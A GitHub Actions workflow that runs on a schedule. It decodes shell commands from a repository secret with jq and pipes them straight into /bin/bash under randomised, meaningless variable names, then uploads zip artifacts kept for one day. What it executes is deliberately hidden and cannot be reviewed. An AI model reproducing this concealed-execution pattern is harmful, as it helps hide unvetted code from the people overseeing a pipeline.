name: nianchunheke
on:
  workflow_dispatch:

  schedule:
    - cron: '10 2,8,14,20 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: nianchunheke
        env:
          swhh62: ${{ secrets.swhh62 }}
        run: |
          printf '%s' "$swhh62" | jq -r .edk59 | /bin/bash
          printf '%s' "$n72325" | jq -r .xhkb6415 | /bin/bash
          echo $kwmm92495 | jq -r .jyide8540 | /bin/bash
          printf '%s' "$u6" | jq -r .uz3 | /bin/bash
          echo $m479 | jq -r .fdf83 | /bin/bash
          printf '%s' "$i43" | jq -r .p11126 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: yX7HWp1U
          path: "*.zip"
          retention-days: 1
